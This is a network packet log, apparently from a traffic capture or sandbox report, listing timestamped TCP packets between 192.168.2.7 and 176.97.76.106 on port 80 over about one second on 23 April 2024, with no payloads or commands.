Apr 23, 2024 09:43:14.816688061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816690922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816699028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816715002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816716909 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816725969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816740036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816749096 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816751957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816762924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816771030 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816775084 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816787958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816795111 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816802025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816816092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816822052 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816833973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816845894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816858053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816858053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816864967 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816869020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816879988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816890955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816895008 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816903114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816914082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816922903 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816926003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816931963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816936970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816948891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816956997 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816962957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816977978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816983938 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816989899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817001104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817012072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817013979 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817023039 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817039013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817040920 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817050934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817061901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817071915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817074060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817085028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817091942 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817095995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817109108 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817120075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817122936 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817133904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817135096 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817150116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817162991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817166090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817173958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817184925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817190886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817195892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817198992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817209959 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817220926 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817231894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817239046 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817244053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817255020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817265987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817269087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817276955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817289114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817291975 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817301035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817313910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817322969 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817329884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817342997 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817353964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817362070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817364931 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817373991 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817378044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817388058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817399979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817405939 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817413092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817430019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817434072 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817441940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817455053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817466021 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817468882 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817476988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817488909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817491055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817502975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817514896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817518950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817531109 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817542076 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817553043 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817553043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817564011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817570925 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817575932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817589998 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817603111 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817604065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817619085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817627907 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817630053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817641020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817646980 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817651987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817665100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817673922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817681074 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817694902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817698956 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817707062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817713976 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817723036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817734957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817747116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817751884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817758083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817769051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817775965 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817780018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817791939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817801952 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817805052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817807913 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817817926 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817835093 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817850113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817857981 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817863941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817873955 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817876101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817888975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817899942 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817900896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817910910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817923069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817923069 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817934036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817945004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817956924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817962885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817967892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817979097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.817986012 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.817991018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818002939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818017960 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818017960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818037987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818042040 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818049908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818062067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818075895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818084955 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818088055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818099976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818109035 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818110943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818124056 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818131924 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818135023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818146944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818157911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818161011 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818171024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818171024 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818182945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818200111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818202019 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818211079 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818219900 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818223000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818236113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818247080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818253994 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818257093 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818269968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818280935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818280935 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818290949 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818293095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818304062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818315983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818317890 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818326950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818337917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818341970 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818348885 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818361044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818372965 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818377972 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818384886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.818401098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818408966 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.818586111 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.864520073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.864559889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.864592075 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.913017035 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040055037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040079117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040132046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040146112 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040157080 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040158987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040169954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040182114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040188074 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040194035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040208101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040219069 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040222883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040241957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040242910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040266991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040277958 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040282011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040293932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040304899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040306091 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040317059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040329933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040344954 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040347099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040360928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040371895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040376902 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040384054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040391922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040397882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040414095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040421963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040426970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040441990 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040446043 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040453911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040465117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040477037 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040481091 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040493011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040499926 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040505886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040523052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040533066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040534019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040544987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040556908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040560961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040586948 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040602922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040642977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040652990 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040664911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040674925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040684938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040688992 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040694952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040709019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040714025 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040721893 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040731907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040740967 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040743113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040752888 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040762901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040766954 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040772915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040783882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040793896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040798903 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040805101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040815115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040817022 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040826082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040836096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040848970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040853977 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040859938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040872097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040883064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040940046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.040955067 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040972948 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.040992022 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041004896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041019917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041029930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041042089 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041052103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041059017 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041063070 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041079998 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041081905 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041094065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041109085 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041135073 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041152000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041162968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041198015 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041421890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041433096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041443110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041457891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041465044 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041511059 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041619062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041707993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041721106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041731119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041740894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041750908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041759014 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041783094 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041793108 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041824102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041834116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041843891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041857004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041867971 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.041868925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.041883945 CEST	80	49702	176.97.76.106	192.168.2.7
